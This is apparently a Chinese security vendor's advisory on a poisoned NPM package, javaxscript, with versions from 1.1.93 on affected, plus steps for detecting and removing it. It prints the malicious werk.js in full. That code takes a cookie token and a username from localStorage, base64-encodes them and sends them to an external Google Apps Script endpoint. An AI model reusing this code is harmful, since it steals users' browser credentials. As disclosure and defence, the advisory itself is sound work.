SBOM风险预警 | NPM前端框架 javaxscript 遭受投毒窃取浏览器cookie

SBOM情报概述

Summary

近日(2025.08.13),悬镜供应链安全情报中心在NPM官方仓库中捕获1起针对JS前端框架组件 javaxscript 的投毒攻击事件,该组件托管在GitHub上的项目源码在1.1.93及后续版本中被植入恶意代码,恶意代码一旦被加载将会盗取用户浏览器cookie敏感数据并回传到投毒者控制的服务器接口。

javaxscript恶意包主页

截至目前,该恶意组件仍正常托管在NPM官方源及国内各大主流镜像源,对于NPM开发者来说存在较大安全隐患。根据官方统计接口,该恶意包的总下载量超过23000次。

投毒分析

Poisoning Analysis

1

github项目投毒

javaxscript组件项目源代码托管在Github平台(https://github.com/Patrick-ring-motive/framework),并通过Github WorkFlow自动构建并发版推送到NPM官方仓库。在北京时间2025年8月12号,项目维护者(Patrick-ring-motive)创建了包含恶意代码的werk.js文件,该恶意文件最终被自动打包并随着组件一同发布到NPM官方仓库(registry.npmjs.org)。

投放恶意文件werk.js

2

窃取浏览器cookie数据

恶意文件werk.js负责解析并提取用户浏览器localStorage以及Cookie中的用户名与token相关敏感数据,窃取的数据最终被base64编码后通过HTTP GET方式发送到投毒者可控的服务器API。

werk.js投毒代码

复制代码
(() => {  const parse = (x) => {    try {      return JSON.parse(x);    } catch {      return x;    }  };  let eagleid = Object.fromEntries(document.cookie.split(";").map((x) => String(x).trim().split("=")).map((x) => [x.shift(), x.join("=")])).id_token_marker;  let name = String(parse(localStorage.getItem("user"))?.FirstName);  const url = new URL("https://script.google.com/macros/s/AKfycbzCqAhWZNUcRaKvXSE9EhSgWvCY4xCgY0U2ksr_nv_eCGd2i-oh8cznalBfqSkSn7C6Vw/exec",);  url.searchParams.set("payload",btoa(encodeURIComponent(JSON.stringify({ eagleid, name }))));  (async () => {    try {      await import(url);    } catch {}    [...document.querySelectorAll(`[id="person"]>[id="title"]:not([x10]),[id*="orgItemInfoContainer"]:has([href="https://apps.usaa.com/enterprise/employee-directory?emplNum=Y3953"]) [id*="orgJobTitle"]:not([x10])`,)].forEach((x) => {      x.innerText = "10x Software Engineer";      x.setAttribute("x10", true);    });    [...document.querySelectorAll("[missing]")].forEach((x) => x.remove());  })();})();

3

IoC 数据

本文分析所涉及的恶意IoC数据如下表所示:

排查方式

Investigation Method

开发者可通过命令 npm list javaxscript 在项目目录下使用查询是否已安装存在恶意投毒的组件版本,如果已安装请立即使用 npm uninstall javaxscript进行卸载。同时还需关闭系统网络并排查系统是否存在异常进程。

此外,也可使用 OpenSCA-cli 工具将受影响的组件包按如下示例保存为db.json文件,直接执行扫描命令(opensca-cli -db db.json -path ${project_path}),即可快速获知您的项目是否受到投毒包影响。

​​​​​​​

复制代码
[     {         "product":"javaxscript",         "version":"[1.1.93, 1.1.94, 1.1.95, 1.1.96]",         "language":"javascript",         "id":"XMIRROR-MAL45-4223C53C",         "description": "NPM组件javaxscript遭受代码投毒窃取浏览器cookie数据",         "release_date": "2025-08-13"     }]

悬镜供应链安全情报中心是国内首个数字供应链安全情报研究中心。依托悬镜安全团队强大的供应链SBOM管理与监测能力和AI安全大数据云端分析能力,悬镜云脉XSBOM数字供应链安全情报预警服务通过对全球数字供应链投毒情报、漏洞情报、停服断供情报等进行实时动态监测与溯源分析,可为用户智能精准预警"与我有关"的数字供应链安全情报,提供情报查询、情报订阅、可视化关联分析等企业级服务。

相关推荐
YHHLAI7 分钟前
[特殊字符] 面试中的 Promise —— 从入门到精通
前端·javascript·面试
xixixi7777719 分钟前
三大 AI 安全里程碑:Akamai 高危风险预警、智能体水印强制落地、PQC 量子安全全产业链统一
大数据·人工智能·安全·ai·大模型·智能体·政策
AI小码44 分钟前
LLM 应用的缓存工程:当每次 API 调用都在燃烧成本
java·人工智能·spring·计算机·llm·编程·api
code 小楊1 小时前
AI函数调用:Function Calling从理论到实战全解析
人工智能
delishcomcn1 小时前
智切未来:AI算法如何重塑不干胶标签分切机的精度与效率边界
人工智能·神经网络·计算机视觉
观远数据1 小时前
ChatBI选型对比:从意图识别到SQL修复,六个维度打分决定是否值得投产
数据库·人工智能·sql
犀利豆1 小时前
AI in Harness(四)
人工智能·后端
imbackneverdie2 小时前
AI4S不止于分子药物:以MedPeer为代表的科研基建打开产业新增量
大数据·人工智能·算法·aigc·科研·学术·ai 4s
agent喵2 小时前
从知识库问答到业务自动化:AI Agent 工作流搭建经验分享
人工智能
kyriewen2 小时前
我扒了 GPT-5.6 的全部编程跑分——有一项 OpenAI 没敢放出来
前端·gpt·ai编程